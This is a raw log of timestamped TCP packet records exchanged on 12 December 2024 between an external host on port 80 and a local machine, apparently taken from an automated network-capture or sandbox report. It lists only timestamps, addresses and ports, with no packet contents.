                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.428977013 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.429069042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.429100037 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.429117918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.429902077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.430028915 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.430054903 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.430078030 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.430969954 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.431067944 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.431092978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.431114912 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.432045937 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.432152033 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.432586908 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.433104038 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.433329105 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.433428049 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.434195042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.434238911 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.434286118 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.435276031 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.435384035 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.435431004 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.435517073 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.436433077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.436490059 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.436572075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.436990976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.437519073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.437613010 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.437664032 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.438474894 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.438606977 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.438658953 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.439526081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.439644098 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.439655066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.439887047 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.440711975 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.440732002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.440785885 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.441668987 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.441775084 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.441840887 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.442790031 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.442883015 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.442950010 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.443809032 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.443861961 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.443892002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.443973064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.444921970 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.444972992 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.445022106 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.445991993 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.446132898 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.446182013 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.447078943 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.447248936 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.447298050 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.448137045 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.448221922 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.448246956 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.448299885 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.449217081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.449352026 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.449403048 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.450334072 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.450457096 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.450531006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.450721025 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.451567888 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.451638937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.451702118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.451749086 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.452455044 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.452569962 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.452641964 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.452683926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.453564882 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.453638077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.453685045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.454617023 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.454665899 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.454732895 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.455610991 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.455642939 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.455660105 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.455718994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.455784082 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.456651926 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.456703901 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.456743002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.456784964 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.457734108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.457779884 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.457953930 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.458163977 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.458842039 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.458911896 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.458962917 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.459917068 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.459966898 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.460051060 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.461193085 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.461241961 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.461266994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.461764097 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.462052107 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.462116003 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.462167025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.462217093 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.463054895 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.463120937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599267960 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599337101 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599419117 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599452019 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599638939 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599653959 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.599725962 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.600590944 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.600658894 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.600728989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.600773096 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.601640940 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.601756096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.601804018 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.602719069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.602823019 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.602875948 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.603851080 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.603888988 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.603935003 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.604831934 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.604919910 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.604943037 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.604984999 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.605935097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.606031895 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.606081963 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.607212067 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.607223988 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.607275009 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.608088017 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.608267069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.608315945 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.609107018 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.609184027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.609230995 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.610722065 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.610855103 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.610862970 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.610918045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.611947060 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.612040043 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.612062931 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.612160921 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.613724947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.613851070 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.613903999 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.614671946 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.614806890 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.614852905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.615566969 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.615607977 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.615634918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.615653992 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.616379023 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.616456985 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.616511106 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.617489100 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.617537975 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.617664099 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.617712021 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.618596077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.618721008 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.618725061 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.618769884 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.619779110 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.619910955 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.619965076 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.620685101 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.620743036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.620806932 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.620857954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.621711969 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.621769905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.621797085 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.621855974 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.622865915 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.622910023 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.623040915 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.623092890 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.623842001 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.623930931 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.623979092 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.624975920 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.625036955 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.625185966 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.625247002 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.625771999 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.625832081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.625889063 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.626633883 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.626732111 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.626790047 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.627455950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.627504110 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.627556086 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.628407955 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.628496885 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.628554106 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.629440069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.629545927 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.629604101 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.630762100 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.630772114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.630825043 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.631648064 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.631695032 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.631725073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.631844997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.632693052 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.632771969 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.632797003 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.632812023 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.633797884 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.633904934 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.633958101 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.634058952 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.634881973 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.634985924 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.635062933 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.635957003 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.636004925 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.636092901 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.636149883 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.637001038 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.637008905 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.637059927 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.638005972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.638070107 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.638725996 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.638798952 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.639122009 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.639131069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.639173985 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.640162945 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.640265942 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.641297102 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.641304016 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.641350985 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.641376019 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.641446114 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.642333031 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.642462969 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.643403053 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.643412113 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.643418074 CET804993131.41.244.11192.168.2.10
